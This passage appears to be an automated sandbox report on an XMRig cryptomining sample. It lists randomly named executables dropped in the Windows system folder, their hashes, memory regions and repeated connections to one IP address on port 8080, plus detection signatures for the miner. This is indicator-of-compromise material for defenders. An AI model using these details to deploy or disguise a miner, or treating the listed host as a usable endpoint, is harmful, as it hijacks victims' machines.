C:\Windows\System\UzXDpqG.exe

C:\Windows\System\AshcbKQ.exe

C:\Windows\System\AshcbKQ.exe

C:\Windows\System\QaYuOwU.exe

C:\Windows\System\QaYuOwU.exe

C:\Windows\System\xjVHEGA.exe

C:\Windows\System\xjVHEGA.exe

C:\Windows\System\wzxdERE.exe

C:\Windows\System\wzxdERE.exe

C:\Windows\System\IkRavAu.exe

C:\Windows\System\IkRavAu.exe

C:\Windows\System\HWYMDoi.exe

C:\Windows\System\HWYMDoi.exe

C:\Windows\System\wxvqFVZ.exe

C:\Windows\System\wxvqFVZ.exe

C:\Windows\System\XGNSyCk.exe

C:\Windows\System\XGNSyCk.exe

C:\Windows\System\liSRFJC.exe

C:\Windows\System\liSRFJC.exe

C:\Windows\System\NCfnygj.exe

C:\Windows\System\NCfnygj.exe

C:\Windows\System\SCKCpgK.exe

C:\Windows\System\SCKCpgK.exe

C:\Windows\System\tPgpQDc.exe

C:\Windows\System\tPgpQDc.exe

C:\Windows\System\zvzwmLS.exe

C:\Windows\System\zvzwmLS.exe

C:\Windows\System\cbBwscg.exe

C:\Windows\System\cbBwscg.exe

C:\Windows\System\fexNWso.exe

C:\Windows\System\fexNWso.exe

C:\Windows\System\TmESXLN.exe

C:\Windows\System\TmESXLN.exe

C:\Windows\System\eqFkdRA.exe

C:\Windows\System\eqFkdRA.exe

C:\Windows\System\PkMHpoT.exe

C:\Windows\System\PkMHpoT.exe

C:\Windows\System\jBtrYga.exe

C:\Windows\System\jBtrYga.exe

C:\Windows\System\AEZqeUd.exe

C:\Windows\System\AEZqeUd.exe

C:\Windows\System\ZLpppgb.exe

C:\Windows\System\ZLpppgb.exe

C:\Windows\System\hhlcHDW.exe

C:\Windows\System\hhlcHDW.exe

C:\Windows\System\mRSMFgk.exe

C:\Windows\System\mRSMFgk.exe

C:\Windows\System\WehCkBA.exe

C:\Windows\System\WehCkBA.exe

C:\Windows\System\CqHbfgx.exe

C:\Windows\System\CqHbfgx.exe

C:\Windows\System\ZYJYpCc.exe

C:\Windows\System\ZYJYpCc.exe

C:\Windows\System\QwtqvBM.exe

C:\Windows\System\QwtqvBM.exe

C:\Windows\System\bLchNXG.exe

C:\Windows\System\bLchNXG.exe

C:\Windows\System\InBUQeH.exe

C:\Windows\System\InBUQeH.exe

C:\Windows\System\Fgbegcf.exe

C:\Windows\System\Fgbegcf.exe

C:\Windows\System\aBRESei.exe

C:\Windows\System\aBRESei.exe

C:\Windows\System\WZIQKYC.exe

C:\Windows\System\WZIQKYC.exe

C:\Windows\System\IMFRPlf.exe

C:\Windows\System\IMFRPlf.exe

C:\Windows\System\vECkiyH.exe

C:\Windows\System\vECkiyH.exe

C:\Windows\System\IWGZhXd.exe

C:\Windows\System\IWGZhXd.exe

C:\Windows\System\SEOebPq.exe

C:\Windows\System\SEOebPq.exe

C:\Windows\System\zvESypy.exe

C:\Windows\System\zvESypy.exe

C:\Windows\System\WLpVllL.exe

C:\Windows\System\WLpVllL.exe

C:\Windows\System\wtkSsYT.exe

C:\Windows\System\wtkSsYT.exe

C:\Windows\System\vNMZNiD.exe

C:\Windows\System\vNMZNiD.exe

C:\Windows\System\wSqltfK.exe

C:\Windows\System\wSqltfK.exe

C:\Windows\System\fuOHWFL.exe

C:\Windows\System\fuOHWFL.exe

C:\Windows\System\BlEjmzE.exe

C:\Windows\System\BlEjmzE.exe

C:\Windows\System\ffKTUsr.exe

C:\Windows\System\ffKTUsr.exe

C:\Windows\System\KxFxBlW.exe

C:\Windows\System\KxFxBlW.exe

C:\Windows\System\PmvlbCU.exe

C:\Windows\System\PmvlbCU.exe

C:\Windows\System\wQnrFtB.exe

C:\Windows\System\wQnrFtB.exe

C:\Windows\System\eyWuASY.exe

C:\Windows\System\eyWuASY.exe

C:\Windows\System\cebdjjh.exe

C:\Windows\System\cebdjjh.exe

C:\Windows\System\WDzaMZw.exe

C:\Windows\System\WDzaMZw.exe

C:\Windows\System\zIuVZvt.exe

C:\Windows\System\zIuVZvt.exe

C:\Windows\System\xsllYAx.exe

C:\Windows\System\xsllYAx.exe

C:\Windows\System\mvTPSNo.exe

C:\Windows\System\mvTPSNo.exe

C:\Windows\System\ORnTuik.exe

C:\Windows\System\ORnTuik.exe

C:\Windows\System\ftoqJWg.exe

C:\Windows\System\ftoqJWg.exe

C:\Windows\System\tSSfUUj.exe

C:\Windows\System\tSSfUUj.exe

C:\Windows\System\MxwttvU.exe

C:\Windows\System\MxwttvU.exe

C:\Windows\System\UfJUDNb.exe

C:\Windows\System\UfJUDNb.exe

C:\Windows\System\LVfKzvo.exe

C:\Windows\System\LVfKzvo.exe

C:\Windows\System\nEPHbPx.exe

C:\Windows\System\nEPHbPx.exe

C:\Windows\System\XoNpzIf.exe

C:\Windows\System\XoNpzIf.exe

C:\Windows\System\sfwOOEH.exe

C:\Windows\System\sfwOOEH.exe

C:\Windows\System\qOBgrcO.exe

C:\Windows\System\qOBgrcO.exe

C:\Windows\System\VODZyue.exe

C:\Windows\System\VODZyue.exe

C:\Windows\System\tOBHHHw.exe

C:\Windows\System\tOBHHHw.exe

C:\Windows\System\qRPCxDO.exe

C:\Windows\System\qRPCxDO.exe

C:\Windows\System\DeAuNnJ.exe

C:\Windows\System\DeAuNnJ.exe

C:\Windows\System\NDjbyoR.exe

C:\Windows\System\NDjbyoR.exe

C:\Windows\System\nFHYiKt.exe

C:\Windows\System\nFHYiKt.exe

C:\Windows\System\lRYgyDF.exe

C:\Windows\System\lRYgyDF.exe

C:\Windows\System\dndhkOT.exe

C:\Windows\System\dndhkOT.exe

C:\Windows\System\LFsUmYh.exe

C:\Windows\System\LFsUmYh.exe

C:\Windows\System\BNqSXtt.exe

C:\Windows\System\BNqSXtt.exe

C:\Windows\System\qLVYdzN.exe

C:\Windows\System\qLVYdzN.exe

C:\Windows\System\nOaYIky.exe

C:\Windows\System\nOaYIky.exe

C:\Windows\System\oUZkzGI.exe

C:\Windows\System\oUZkzGI.exe

C:\Windows\System\XNktRhq.exe

C:\Windows\System\XNktRhq.exe

C:\Windows\System\aNTkutJ.exe

C:\Windows\System\aNTkutJ.exe

C:\Windows\System\KwLJLIs.exe

C:\Windows\System\KwLJLIs.exe

C:\Windows\System\MXtEqKJ.exe

C:\Windows\System\MXtEqKJ.exe

C:\Windows\System\WXKsTKK.exe

C:\Windows\System\WXKsTKK.exe

C:\Windows\System\jHXYUon.exe

C:\Windows\System\jHXYUon.exe

C:\Windows\System\UyYMaWa.exe

C:\Windows\System\UyYMaWa.exe

C:\Windows\System\ZZyWjwe.exe

C:\Windows\System\ZZyWjwe.exe

C:\Windows\System\HlbhhwZ.exe

C:\Windows\System\HlbhhwZ.exe

C:\Windows\System\kBxzdQG.exe

C:\Windows\System\kBxzdQG.exe

C:\Windows\System\XlAyfYc.exe

C:\Windows\System\XlAyfYc.exe

C:\Windows\System\iSQxwkM.exe

C:\Windows\System\iSQxwkM.exe

C:\Windows\System\imQOvVF.exe

C:\Windows\System\imQOvVF.exe

C:\Windows\System\FtzHkzx.exe

C:\Windows\System\FtzHkzx.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2128-0-0x000000013F2A0000-0x000000013F692000-memory.dmp

memory/2128-1-0x00000000001F0000-0x0000000000200000-memory.dmp

\Windows\system\kzhZMUi.exe

MD5 4ac4b3aa420d3401374d2811e57c6ade
SHA1 0a96fe43baa4f8a065e6beee5edab2783812d537
SHA256 2f3948563159929b7f2ab13afd6532df8c0b8f05ea649c4a75d9d836af90f0df
SHA512 45a15ba9d1648725c40e29afdf4029a900e1e61908c3b7bfaf2cbd82a74e0f4d7b98dd25025df20d0e6240907007b10bbe35d489d655947f667626e23478d8be

C:\Windows\system\oKaxLgI.exe

MD5 065898cd3e68214a8963d530a77def21
SHA1 7cbad244466ca8abf20f759a1ad7f65fcc61bcae
SHA256 c54fd6255774a37381cd6c1ad88d36cfc2a81923b2ab4b8eea99e3f96d566740
SHA512 fbcc3ca199b4fced9bab199aa22b88c4976852e8a96a0c686cac23097aca12f7e52ae879fba83284e5099244d91a070481a364c1a7ccbd1d36c9b2ba8a9c3195

C:\Windows\system\yWdUHzx.exe

MD5 1dc2200b33c914e6ad24b25a70979f27
SHA1 6530a8123ae355527e99c4b71ab370b3eb250652
SHA256 fa2b933638e7505532b01365b8683d6a3c326fe8e1559dbd097615e18d92f001
SHA512 a3567141055b39562ca81537de1d017f4b5d90938497da7fa0a55d70bf5f37a65c45060ed4f3a2c00b177702e4cf7c98a3bdddaffa6e1bf1d3976005849192fc

\Windows\system\COzodZx.exe

MD5 1ec74a1391bf79efa89ff64cad149940
SHA1 6b47092e44695c4e68dae5610d5ce7df1d51b63f
SHA256 19ab56f8b24a95133388452fa73917d9b370817bcb4c7705ff0cc2b533a5f13a
SHA512 5c321f2a8d193f7376e701ce8c2e8234c80f39c5a1deaf15841b7b4a08332aee0b5cd586ee78b75cc7e45596c268d4c66aa7bd6fe6c0e0b5c0f2710a3dc32bd1

\Windows\system\VpgLoIr.exe

MD5 2daa90dd74d7ba16d962823c1eb0f471
SHA1 536cf3d793026166b58da8ef1e672cc74bd77bf7
SHA256 0111ddd3917165d7d023ac7246abd1e74a755f4832cee1a8b434dcf27d82c669
SHA512 7f652f73284e3f1ae1f0fce95bd9858ab480ac78e4c65d938f5700008ab8e94f7391453831d3b0e4f55eece0beb78756f5e5907e0d8686248e51f328926fa0e1

\Windows\system\bxKbcrq.exe

MD5 5f7dc56343d673c5c09dacdfefac17d5
SHA1 d7b57c5a6865e74c8390b38aea5c642b32d149e3
SHA256 670a0c2f7c9365b053cf57f6be67ff0d381252d702cd3e7dba03966a5d3a1942
SHA512 8979ab25b16b80cd842cd8bf5f559cf34702a46804c1360be252e5a85c5a4fd928dd7dfd264fd5e5fc547492036a55deb572bb66e52edfde469f403d4d565b4d

C:\Windows\system\ftGFGCo.exe

MD5 d78384cd1aee3a70542a92024b9b0516
SHA1 4ebd83e692d75c3a07a162beff29ebcf558516e8
SHA256 d6f22fbfacb75b2daa2de773563ee4b4f35204b47bab54a919809f1c846c01fd
SHA512 8fc7f5dc21bd54186008485ee6bd12fbf295355afe834e6e932eda20a337de19d2ec501bbc224957920c4141ee9b1ad383f62433a96ce4250e9f588451630750

memory/2808-186-0x000000013FBD0000-0x000000013FFC2000-memory.dmp

memory/2128-191-0x000000013FF30000-0x0000000140322000-memory.dmp

C:\Windows\system\utdQnkO.exe

MD5 5ba53fb89f0fe2b66bcda1b6c15eaa1d
SHA1 fa8874b7705c0f59fd1aeebaf956401be1214143
SHA256 0f9129bd5e61897e98e6a2f3aac7542da2b5f11b77e4514283f90ee7477b5266
SHA512 fc13e2da84fb2da083c11a3e93c83df4ac1db28a08844e6c8947f322db7bceaefbd3735cca20ca30e8ddf60eef1b9126a6e2c15850bf8d279978ea921a9e53e8

memory/2128-193-0x0000000002F70000-0x0000000003362000-memory.dmp

\Windows\system\FXUdoJX.exe

MD5 1c66939713a2a4a27b3c595da9ce35d2
SHA1 aa04967639445f6df9973784ad7887fd5cca1048
SHA256 eb61c6cb96390f609f75072bfe263a97314ce1c3c7d06d7929f0c2129b580f31
SHA512 d80b2047302ab177549de7546f1279b753d6f9969d46163a6f69ae61b229c795fcfba7a43ff30d6b408b05a020bbf91bfc998e412531164cb69ec497f8dc4407

memory/2128-160-0x000000013FB40000-0x000000013FF32000-memory.dmp

C:\Windows\system\opGlllv.exe

MD5 cd8874b4860a14f08f95d3ccfc80e56c
SHA1 c24fbd13273d75e13402b972faa2b0da1f6d9b05
SHA256 f9bd7d592de44a1adead216d114be0168ff73805f2e5a70d8caecdc0584f4aae
SHA512 3a94d3e8888d6ad4e75de0c98882a8d8c224f23ae56434f5dba15a046d547f863748865254856047fdce71e1401ff4a6da030af97d6f66bad0750d66cfdc207c

C:\Windows\system\zjHaHPq.exe

MD5 a974eb6e43a71a1d6bdc3d11c401cbb2
SHA1 a6e684697fa20f7a044fe31037153752f5800dec
SHA256 c1a8c4af097080a78082e1bf4416501546e7a7f68674748fbd3330e168877367
SHA512 ab1fd4b2b54a4ec3a1726b53adfd73d3009b5be2eef93a7649b9d86d938db7be6b72c68fefd152881165257aa51389458066ecb3ab97d572b0860f80631de828

C:\Windows\system\YnZlPYf.exe

MD5 f767d6979f8309361a96a7262309d7f2
SHA1 7a3eed1ba0a2f7d4ae78d321fe6f78a54c5c239d
SHA256 3fbe86d352c6d8421fbb3ace8d712a12860bbd3c1c5a4dd15da1e50c74c7af7b
SHA512 624ba1c2469f10d3adba7ae7df284357494dced33b89b47578c7d2cc5fdf7408774b3a111ec66511df1cb818ab7797d028c7cd7d44c2542dc52b6a9aa3acf94f

C:\Windows\system\aThtiug.exe

MD5 4145a3635a247914cc09342e42db1059
SHA1 1fa3211f6370a175a6fd5f3f0fd00a6f75918e4d
SHA256 f87ff0e1f243afbcbae4e28de3a5f217601529e96396c124ad9b025ed961e28e
SHA512 ce912bf4753ca2190806f38087f70b029db0c6395a0a15c9336387840a56ae0cf8646987778d758aa17793f31c94f52c9a8192cf0e7de359788314b3fb5cc283

C:\Windows\system\XPuNWUj.exe

MD5 cca2ca0b0e3da9ffff5269254003bbf5
SHA1 f4c5031f066d721866a799f0b05a089f48da554d
SHA256 90406eaf8bbdce90a64985c546600865b7c9e0311287394a7c75828f57c8461e
SHA512 a543158e750f603644a9cfc8fba3c07a338ea38bc5b46c084f2b7bde63f15f1d52e34c589062cf7232b2ee49276a6e1ce86b86b131ff2aa20623cdb15c731d73

C:\Windows\system\AQafrOB.exe

MD5 bcffd4a5c46fe117e6e554fbc1d083a5
SHA1 0d9a5681fd538ffe386d716466d6660f5b5d60aa
SHA256 1b5c4773e3815c4f3ecadcc3727bc6681568ed306caec92eaf3e309d4a8fd609
SHA512 489b17f3bcafd193029b3dd9b7759d9c188da7f27a3216656220eccc287bf1edec0e2c70135d37b734015cb8e8a74efcd63bdb26fe40f9df3950a13b4e26cf69

C:\Windows\system\inNdZno.exe

MD5 ecaf732c0bf4a62ba553de0279378c2e
SHA1 a95ea7d267df6f1de44ef134c83da788e5202487
SHA256 6dff28d4d8731828baa9267661b1bc82ee2e50b9bd98cb8d9e36138c9632ba50
SHA512 edc69869252a9f0199dbac567946aa23df7e678e01981f86a4f2d65cf07904ef8cf6403b2d0c0f88b1faa30b2781cff039735d9faf32faba927c3d7312056e02

C:\Windows\system\nzWUwMH.exe

MD5 e5940a37f54091325f1b9f437a83233e
SHA1 c1ed69a21c35c5f265377c03bdae328fd384502a
SHA256 8197aa02c084b41474bf43e81c7e7a2b8b2f2da78c3f5c1395b2cc957d717f60
SHA512 4f35ed17a1e473984f83aad1fd256e67a93484b496a89001e04ac5b1fd6766053acd18b576b4ee92d7aad717a1823b9e48f96dc2f83fa22fc0a04d1e57a9522e

C:\Windows\system\xPSzUjD.exe

MD5 e70c79bd295d1fa26ca93aff18ea39dc
SHA1 67fd722f28a07e5cae242b8f480842b956526860
SHA256 70276c13b1022fa67538ba1c82cf28baf3f621c7ee7997df24deb17f1360ac2a
SHA512 c5520a4c00df506569cdfbd16c8449d10757dc7c3512391127c3d3c5545083d8e527d2c09e7d1bc27ada2e7a6ed8cc35085297fbd2ac61ee38d57c21553cdcdd

C:\Windows\system\cCCbAEQ.exe

MD5 1fffba9127db582e2e8cf1a64fdfaac9
SHA1 95e7725b228c3d3104d01bbda553f2b525a861e4
SHA256 994c032d312d41ad6ffc7f4b86a447eb3b212fcca36efb0402bd091d46ac18ba
SHA512 8b0262acf215eac9a642370bdc054e1397fe410a09af9b732aca8aaa45f8e1468838257e3fa6ebb3f99889226f2099fc4eeae943ccacec366ae76d01b62c1a78

memory/2128-146-0x000000013FA60000-0x000000013FE52000-memory.dmp

memory/2996-145-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

\Windows\system\BTXkXZl.exe

MD5 7b974b6bfbff25212f281f12af7143b9
SHA1 4bd94cb41f62125c98dea2ba23be61b741ea0d2e
SHA256 425975ff0c61045c7c232b3647aabeb20d2e682666b6302885dc35f405156ee0
SHA512 72f61de73f349153fce97b01d1ac46d243d2b01efe6c378ca3a39c4996df36fbb2e78fb71207e7a7111fcdcac0c0e44488ef4815d52bd3d05fd777a8619ec7cf

\Windows\system\XaFZixs.exe

MD5 13e0a8da78041bb2b341d6d4529bc38b
SHA1 6efef6ff2c1cbda558bbb2f5ca269b1328d3a41d
SHA256 aeebcbc62005a540e40f6fb79aab452eebf8fcf841db9c8c0df4cc4708c49e42
SHA512 d1778b141f98c3aa8ab14d262e5e7748670de0e5c57afd2e6ce9036be14d2172f42f7a91e9ab1ccf930299c771238adaf02d770508aa4694c32d77540aee3ab3

\Windows\system\oZOBfpG.exe

MD5 5603e86d9031a4f60455d7c7531bc2c4
SHA1 d1b92754825d4e3db953123e949072c4e572e45a
SHA256 c3ac10ac44ac7955e3ef12490f9b2216f5c3450084d575ea3656796dee65c9c7
SHA512 f7c568569e782de343c8dcac3aca027c46b0b028c25100c67f012dc8739afb247ff6811342169b7fbacc2cb8312864aabecabf59c17e8f934d5ca3838ee69506

\Windows\system\eNAvOsm.exe

MD5 b93db4c82da5479ac6edb5f5ec195d20
SHA1 5caec1b26659e2e313130ad29fff622439fe42fb
SHA256 072a37808d66dd21b2e53a5f4a3e97b293b675582024933b69519b2b75c0932f
SHA512 ce6da27346397912dec432340cb8eae74c004bbdd469d600ff9e46578194b496e9dd7cd3c7b685ecf2ffa8dd213e22b0e0d40ad43cdff7223773ebc6ed0771cf

\Windows\system\ODxgpXY.exe

MD5 41da7ff2d58a39abe6efbb6621d8e104
SHA1 349543616fd2e6959625acd01384e91f6ec91c37
SHA256 5868e45568259aa21372574c7225c02caa4af31d5a8832d816b725b57cea787f
SHA512 6f732f1d944d0efe7124601e1ed7c921ed19a663d59c65e4e4ac1752530d78d961e6e3ffa4e55be591582119169cc627260f9801664d234a2c2eaa916934ac98

\Windows\system\HVEQEQM.exe

MD5 ace6e09faf6d7a115864dae83c5c8b46
SHA1 485c9007c5d0c6561974ae6bf19305198c500a59
SHA256 b034315b0d2b877fc15f779b19857b96e834ae60dce60c63143bbcc9c34c09ed
SHA512 d92c6a922472e29d0cc1285edcd0070be5d6e89408684fdd208638c926af8ee953c1c3a4256fc28fcade86c3850f97b76228aeaaf87ee67e156220571ac3ac50

\Windows\system\VhBoqED.exe

MD5 d48045aede4471c85389852d9f391c4e
SHA1 21c9b0c9dbcdcd0193816cc321d822c1e23e0c9c
SHA256 81b95275e4ea491dde79ce30f2ef295c94a0d4d8d4f061398520f53703109ec7
SHA512 0a77c23981167f5210236347a3c8d47c8a079020fcf4b9afbeaacb2b7b22810cd13e8a002717c23c3e45433883965a58b45fb38dc8107aa6ca639405c7aab163

\Windows\system\roemEhd.exe

MD5 8f57df6f3823cc76d26c362f521e4cb1
SHA1 aab0786ca2d8727e150f2b4ce5d008b39870c0a3
SHA256 56988a6b2cb21a9822d80fdab63320a73ce4d56ef4fb98384f267ecd1ff7a85b
SHA512 24cfa043537c8dde244b554b4f7455e9fc372a25955397df97a7749de3f596bb7f38434ed07dfafdfc6d7fdac439de1eccadae1057efdb27f8c2f5325ce12f47

\Windows\system\OWucenH.exe

MD5 08c857edf4cdc98e27488a39c4d19ddf
SHA1 b45afcb5027e2dd6f8879393dc97e7f7a14dfd66
SHA256 0944b7d2aac095c5634b7fdd765ac2b50c3e929b2057cdb389ff956cc783488c
SHA512 2b9c08c1638d73c7fc0703c59b588c1bcc44373ca1ec04b32aef2f69cef9c7555395efca7a4030ec4f0d40cc42cae24dc1dc9fbe94cbe888a80be0d8d8c1be25

C:\Windows\system\LUmkYiW.exe

MD5 3fe2626c720b9444846d753ab18248d0
SHA1 e5244e79bcab9dcd9d8f895829f6fdc793fb4178
SHA256 4481b1cb16a79f80821e556142f761cb5fd69cc575bbdedde9edd346902a4529
SHA512 f413a8db3f5430cbee3949a51405316e1e290b4e0357db11be68c28d6682ab8be98d66e16739b25cbf29112e7acbdae79c7029aa567338741d920ba5fb71349a

C:\Windows\system\vfYPDbk.exe

MD5 014d5bbbf223d726c7c7ae37b5532635
SHA1 f6b3d4c1b90eb1dcd3fb596eb501dfd8812c9d21
SHA256 c6738e4be6aa6eebdbdf25c443ff50816056ae85dc11a61b6e3bd5e80b011d59
SHA512 9615038b63a684b6303e88f3a972844e4124650fe4b02268be6e34dd2b0a78bf543a619451da3acecedc85547ed6b7f75d2c4f6a13fdf10596104417e14ff228

C:\Windows\system\IXSYrsr.exe

MD5 d44b569c68e0133ad6b421b414936d3a
SHA1 c13e6f00491221ee6cd8b3ddc7f4c445b6e6ca4e
SHA256 73d31fbc4d3179a853f91746ee0905fc1f03f8b1a32d5c3a5ebe36dfdc83a4e0
SHA512 c0bc1cb058c53be01d48f3d0885c86d7bdc1f0812271096e61fce8d7fbcc29b21fabce6b8d595320ac64825b817455bd0fbc99165e8389ce566756be29ff2b2c

C:\Windows\system\oVQGSwE.exe

MD5 d4520daa7fd177da35875546186e78ab
SHA1 71f51c0f406b9eff3f2fd09400fc32d205dff5c0
SHA256 73879b6af8bc2dde827eb1ed3b77be902271d2533430c0d15f3e5d401409ca8f
SHA512 829d16de029a413fa0db80d430aaca616f4814725da5a7a2e7e66b9c10063f85462a0941e9ed031f60434a0ae0a17b8167e7b312a30ea50e2d1fe8e3cbdaa084

C:\Windows\system\wHmaeeg.exe

MD5 faa9961afa0928ecbd4bf123153b1d0d
SHA1 063af1c9aa5f27a7dade44cc6cc02af57a698520
SHA256 b70a92bb90d91a397b40979e8a93da52dd5a705a454be5301fcc11c618fae263
SHA512 6f95858a26c7cdee5804597da991da7920c73b155197d439bcb2f8abf3247a925fba31dddda63ac1ce8a45d2580f8d2d61955b077d67722064b9ddfdd4a2168e

\Windows\system\APFUMiO.exe

MD5 3e3b3209d3a9a8c3f3c749ae82325d4d
SHA1 07893efa58aaf2e76a9200ace7a8b27092aaca88
SHA256 2c7f5390de7a05819c3ebe6b5a26bc6069867f45b4ad036548b258a3afe7bfaa
SHA512 b39ce689e44ebba105d4a12cb6a6f5d3a34ebbdfd9bccd03645a8da991ef37508914d052b1e1622aa65a9b5b5b74b38a2427a637fe8ffbb66243069c5f1e138b

\Windows\system\YQVGiyM.exe

MD5 d53c5fbb671b270094050f11201c5740
SHA1 4a15ca6a63e0d81ed75c6dd84fceb4e8e63e1036
SHA256 e39d4bc43b23a88357bf935db3f682f507c40f0e8873a0788ccd447c47a56411
SHA512 ee84e34cfebd587ba5cab1526eb0092628a9c6a596bc126f81bf79e3aca709a537c136de314b1b070f0c93b3d0044c63f07d7f213ed335878850995c32e6fbbd

memory/2128-50-0x000000013F740000-0x000000013FB32000-memory.dmp

memory/2996-218-0x00000000028E0000-0x00000000028E8000-memory.dmp

memory/2128-192-0x000000013F980000-0x000000013FD72000-memory.dmp

memory/2128-190-0x0000000002F70000-0x0000000003362000-memory.dmp

memory/2128-189-0x000000013FBD0000-0x000000013FFC2000-memory.dmp

memory/2592-188-0x000000013F2D0000-0x000000013F6C2000-memory.dmp

memory/2588-177-0x000000013FDA0000-0x0000000140192000-memory.dmp

C:\Windows\system\gSSGChD.exe

MD5 84947489fc077b3fc4f350187a7482fe
SHA1 e47711d4361844efe34f03ffb17fd86389efce9a
SHA256 4219665036ce96b09d40ba1543feb2e2595fd4e02f7fd6cbb5c063a88d8f3d6d
SHA512 aa59e2afcb9aeb81547b02a40eea495f8232c7f2db94a26ae73f5fd6b090800b691427a157240df145d497195c52358738fc4f04f092086861fa76b82c6d06c4

C:\Windows\system\BDQxwKY.exe

MD5 7b1c00545c403be29edf4013bc6fadb2
SHA1 7ef0dcaa47c8d7f72d9633804bff17e7a2df1d96
SHA256 39ccded63378a452cbce0ccc94762f7fb6d9b757592ec37a3756dd45bb467624
SHA512 d70f52078bb9699f04174a4be37856de08d16864b13cb361940b2ad284e37b04cdc7601bba13b1d11b9801732f691f24763d2120b1862a2d3a8736a883a2dc99

C:\Windows\system\coXMrac.exe

MD5 56efc3178a8d22fb7856fb25ff761cbc
SHA1 d8426f4e0fe86daf9d48c5b6ba8aa08c695c9b45
SHA256 f63491e2ff2a4d3e0f1951f6b353b8bac81b435b6873365090f9c08e555a2c82
SHA512 84c14c99898bd88a26b7666b5e74c245f25686e3c3bc60e46cea517f610c1749ea50ed2ac609ad7ffe51a010cb29d995de57f0d5981db436a5f3747317619d1b

memory/2656-164-0x000000013FAC0000-0x000000013FEB2000-memory.dmp

memory/2128-36-0x000000013FDA0000-0x0000000140192000-memory.dmp

memory/2128-28-0x000000013FAC0000-0x000000013FEB2000-memory.dmp

memory/2128-59-0x0000000002F70000-0x0000000003362000-memory.dmp

memory/2128-46-0x000000013F6C0000-0x000000013FAB2000-memory.dmp

memory/1972-24-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

memory/2668-19-0x000000013F410000-0x000000013F802000-memory.dmp

memory/2128-16-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

memory/2128-15-0x00000000029D0000-0x0000000002DC2000-memory.dmp

memory/3012-14-0x000000013FDA0000-0x0000000140192000-memory.dmp

memory/2128-4-0x000000013FDA0000-0x0000000140192000-memory.dmp

memory/1972-4891-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

memory/2668-4893-0x000000013F410000-0x000000013F802000-memory.dmp

memory/2656-4899-0x000000013FAC0000-0x000000013FEB2000-memory.dmp

memory/2592-4898-0x000000013F2D0000-0x000000013F6C2000-memory.dmp

memory/2588-5048-0x000000013FDA0000-0x0000000140192000-memory.dmp

memory/2808-5038-0x000000013FBD0000-0x000000013FFC2000-memory.dmp

memory/2128-8920-0x000000013F2A0000-0x000000013F692000-memory.dmp

memory/2128-12868-0x000000013FDA0000-0x0000000140192000-memory.dmp

memory/2128-12971-0x00000000029D0000-0x0000000002DC2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 19:02

Reported

2024-06-14 19:05

Platform

win10v2004-20240611-en

Max time kernel

115s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe"

Signatures

xmrig

miner xmrig

Detects executables containing URLs to raw contents of a Github gist

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX dump on OEP (original entry point)

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
